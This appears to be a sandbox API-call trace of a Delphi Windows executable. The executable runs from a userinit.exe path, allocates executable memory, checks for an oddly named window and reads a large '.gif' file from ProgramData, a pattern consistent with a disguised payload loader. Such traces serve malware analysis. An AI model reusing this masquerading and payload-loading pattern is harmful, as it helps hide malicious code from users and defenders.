[0107.199] GetStockObject (i=7) returned 0x1b00017
[0107.199] GetStockObject (i=5) returned 0x1900015
[0107.199] GetStockObject (i=13) returned 0x18a002e
[0107.199] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0107.199] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0107.200] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0107.200] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0107.201] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0107.202] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0107.202] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0107.202] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x24f7cc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0107.202] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0107.202] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0107.202] GetVersion () returned 0x1db10106
[0107.202] GetCurrentProcessId () returned 0xf9c
[0107.202] GlobalAddAtomA (lpString="Delphi00000F9C") returned 0xc144
[0107.202] GetCurrentThreadId () returned 0xfa0
[0107.202] GlobalAddAtomA (lpString="ControlOfs0040000000000FA0") returned 0xc143
[0107.202] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000FA0") returned 0xc169
[0107.202] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0107.202] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0107.202] GetSystemMetrics (nIndex=19) returned 1
[0107.215] GetSystemMetrics (nIndex=75) returned 1
[0107.215] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x661310, fWinIni=0x0 | out: pvParam=0x661310) returned 1
[0107.215] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0107.216] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0107.216] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x301bb
[0107.216] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0107.216] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0107.216] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0107.216] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x301b9
[0107.216] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x301b7
[0107.216] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x301b5
[0107.216] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x301b3
[0107.217] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x301b1
[0107.217] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x301af
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0107.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0107.217] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0107.217] GetDC (hWnd=0x0) returned 0x1201087d
[0107.217] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0107.217] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0107.217] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0107.217] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x66155c) returned 1
[0107.218] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x24fb37, fWinIni=0x0 | out: pvParam=0x24fb37) returned 1
[0107.218] CreateFontIndirectA (lplf=0x24fb37) returned 0x110a086e
[0107.218] GetObjectA (in: h=0x110a086e, c=60, pv=0x24f928 | out: pv=0x24f928) returned 60
[0107.218] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x24f9e3, fWinIni=0x0 | out: pvParam=0x24f9e3) returned 1
[0107.218] CreateFontIndirectA (lplf=0x24fabf) returned 0xf0a0861
[0107.218] GetObjectA (in: h=0xf0a0861, c=60, pv=0x24f928 | out: pv=0x24f928) returned 60
[0107.218] CreateFontIndirectA (lplf=0x24fa83) returned 0x940a0705
[0107.218] GetObjectA (in: h=0x940a0705, c=60, pv=0x24f928 | out: pv=0x24f928) returned 60
[0107.218] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0107.218] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x24fa97, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0107.218] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x24fa97 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0107.218] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0107.219] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x24fa4c | out: lpWndClass=0x24fa4c) returned 0
[0107.219] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0107.219] GetSystemMetrics (nIndex=0) returned 1440
[0107.219] GetSystemMetrics (nIndex=1) returned 900
[0107.219] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x301e2
[0107.222] SetWindowLongA (hWnd=0x301e2, nIndex=-4, dwNewLong=856047) returned 4219500
[0107.222] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0107.222] SendMessageA (hWnd=0x301e2, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0107.222] DefWindowProcA (hWnd=0x301e2, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0107.234] DefWindowProcA (hWnd=0x301e2, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x3020d
[0107.234] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0107.234] SetClassLongA (hWnd=0x301e2, nIndex=-14, dwNewLong=65575) returned 0x0
[0107.235] GetSystemMenu (hWnd=0x301e2, bRevert=0) returned 0x401a9
[0107.237] DeleteMenu (hMenu=0x401a9, uPosition=0xf030, uFlags=0x0) returned 1
[0107.237] DeleteMenu (hMenu=0x401a9, uPosition=0xf000, uFlags=0x0) returned 1
[0107.237] DeleteMenu (hMenu=0x401a9, uPosition=0xf010, uFlags=0x0) returned 1
[0107.237] GetKeyboardLayoutList (in: nBuff=64, lpList=0x24fa18 | out: lpList=0x24fa18) returned 1
[0107.238] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0107.238] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0107.239] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0107.239] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0107.240] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0107.240] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0107.240] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0107.240] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0107.240] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0107.240] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0107.240] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0107.240] GetCurrentThreadId () returned 0xfa0
[0107.240] GlobalAddAtomA (lpString="WndProcPtr0040000000000FA0") returned 0xc142
[0107.240] VirtualAlloc (lpAddress=0x664000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x664000
[0107.240] ShowWindow (hWnd=0x301e2, nCmdShow=0) returned 0
[0107.241] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0107.241] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0107.241] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f798*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x24f798*=0) returned 0x0
[0107.241] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f790*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x24f790*=0) returned 0x0
[0107.241] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f790*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x24f790*=0) returned 0x10be00
[0107.241] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x24f790*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x24f790*=0) returned 0x0
[0107.242] GlobalLock (hMem=0x580004) returned 0xc40020
[0107.242] ReadFile (in: hFile=0x98, lpBuffer=0xc40020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x24f7ac, lpOverlapped=0x0 | out: lpBuffer=0xc40020*, lpNumberOfBytesRead=0x24f7ac*=0x10be00, lpOverlapped=0x0) returned 1
[0107.323] CloseHandle (hObject=0x98) returned 1
[0107.324] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.324] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.324] GlobalUnlock (hMem=0x58000c) returned 0
[0107.324] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4000, uFlags=0x2) returned 0x58000c
[0107.324] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.325] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.325] GlobalUnlock (hMem=0x58000c) returned 0
[0107.325] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6000, uFlags=0x2) returned 0x58000c
[0107.325] GlobalLock (hMem=0x58000c) returned 0x12a820
[0107.326] GlobalHandle (pMem=0x12a820) returned 0x58000c
[0107.326] GlobalUnlock (hMem=0x58000c) returned 0
[0107.326] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8000, uFlags=0x2) returned 0x58000c
[0107.326] GlobalLock (hMem=0x58000c) returned 0x130830
[0107.327] GlobalHandle (pMem=0x130830) returned 0x58000c
[0107.327] GlobalUnlock (hMem=0x58000c) returned 0
[0107.327] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa000, uFlags=0x2) returned 0x58000c
[0107.327] GlobalLock (hMem=0x58000c) returned 0x130830
[0107.327] GlobalHandle (pMem=0x130830) returned 0x58000c
[0107.327] GlobalUnlock (hMem=0x58000c) returned 0
[0107.327] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc000, uFlags=0x2) returned 0x58000c
[0107.328] GlobalLock (hMem=0x58000c) returned 0x13a840
[0107.328] GlobalHandle (pMem=0x13a840) returned 0x58000c
[0107.328] GlobalUnlock (hMem=0x58000c) returned 0
[0107.329] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe000, uFlags=0x2) returned 0x58000c
[0107.329] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.329] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.329] GlobalUnlock (hMem=0x58000c) returned 0
[0107.329] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10000, uFlags=0x2) returned 0x58000c
[0107.329] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.329] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.329] GlobalUnlock (hMem=0x58000c) returned 0
[0107.329] GlobalReAlloc (hMem=0x58000c, dwBytes=0x12000, uFlags=0x2) returned 0x58000c
[0107.330] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.330] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.330] GlobalUnlock (hMem=0x58000c) returned 0
[0107.330] GlobalReAlloc (hMem=0x58000c, dwBytes=0x14000, uFlags=0x2) returned 0x58000c
[0107.330] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.330] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.330] GlobalUnlock (hMem=0x58000c) returned 0
[0107.330] GlobalReAlloc (hMem=0x58000c, dwBytes=0x16000, uFlags=0x2) returned 0x58000c
[0107.330] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.331] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.331] GlobalUnlock (hMem=0x58000c) returned 0
[0107.331] GlobalReAlloc (hMem=0x58000c, dwBytes=0x18000, uFlags=0x2) returned 0x58000c
[0107.331] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.331] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.331] GlobalUnlock (hMem=0x58000c) returned 0
[0107.331] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1a000, uFlags=0x2) returned 0x58000c
[0107.331] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.332] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.332] GlobalUnlock (hMem=0x58000c) returned 0
[0107.332] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1c000, uFlags=0x2) returned 0x58000c
[0107.332] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.332] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.332] GlobalUnlock (hMem=0x58000c) returned 0
[0107.332] GlobalReAlloc (hMem=0x58000c, dwBytes=0x1e000, uFlags=0x2) returned 0x58000c
[0107.332] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.333] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.333] GlobalUnlock (hMem=0x58000c) returned 0
[0107.333] GlobalReAlloc (hMem=0x58000c, dwBytes=0x20000, uFlags=0x2) returned 0x58000c
[0107.333] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.333] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.333] GlobalUnlock (hMem=0x58000c) returned 0
[0107.333] GlobalReAlloc (hMem=0x58000c, dwBytes=0x22000, uFlags=0x2) returned 0x58000c
[0107.335] GlobalLock (hMem=0x58000c) returned 0x146820
[0107.336] GlobalHandle (pMem=0x146820) returned 0x58000c
[0107.336] GlobalUnlock (hMem=0x58000c) returned 0
[0107.336] GlobalReAlloc (hMem=0x58000c, dwBytes=0x24000, uFlags=0x2) returned 0x58000c
[0107.336] GlobalLock (hMem=0x58000c) returned 0x146820
[0107.336] GlobalHandle (pMem=0x146820) returned 0x58000c
[0107.336] GlobalUnlock (hMem=0x58000c) returned 0
[0107.336] GlobalReAlloc (hMem=0x58000c, dwBytes=0x26000, uFlags=0x2) returned 0x58000c
[0107.338] GlobalLock (hMem=0x58000c) returned 0x16a830
[0107.339] GlobalHandle (pMem=0x16a830) returned 0x58000c
[0107.339] GlobalUnlock (hMem=0x58000c) returned 0
[0107.339] GlobalReAlloc (hMem=0x58000c, dwBytes=0x28000, uFlags=0x2) returned 0x58000c
[0107.339] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.339] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.339] GlobalUnlock (hMem=0x58000c) returned 0
[0107.339] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2a000, uFlags=0x2) returned 0x58000c
[0107.339] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.340] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.340] GlobalUnlock (hMem=0x58000c) returned 0
[0107.340] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2c000, uFlags=0x2) returned 0x58000c
[0107.340] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.341] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.341] GlobalUnlock (hMem=0x58000c) returned 0
[0107.341] GlobalReAlloc (hMem=0x58000c, dwBytes=0x2e000, uFlags=0x2) returned 0x58000c
[0107.341] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.341] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.341] GlobalUnlock (hMem=0x58000c) returned 0
[0107.341] GlobalReAlloc (hMem=0x58000c, dwBytes=0x30000, uFlags=0x2) returned 0x58000c
[0107.341] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.342] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.342] GlobalUnlock (hMem=0x58000c) returned 0
[0107.342] GlobalReAlloc (hMem=0x58000c, dwBytes=0x32000, uFlags=0x2) returned 0x58000c
[0107.342] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.342] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.342] GlobalUnlock (hMem=0x58000c) returned 0
[0107.342] GlobalReAlloc (hMem=0x58000c, dwBytes=0x34000, uFlags=0x2) returned 0x58000c
[0107.342] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.343] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.343] GlobalUnlock (hMem=0x58000c) returned 0
[0107.343] GlobalReAlloc (hMem=0x58000c, dwBytes=0x36000, uFlags=0x2) returned 0x58000c
[0107.343] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.343] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.343] GlobalUnlock (hMem=0x58000c) returned 0
[0107.343] GlobalReAlloc (hMem=0x58000c, dwBytes=0x38000, uFlags=0x2) returned 0x58000c
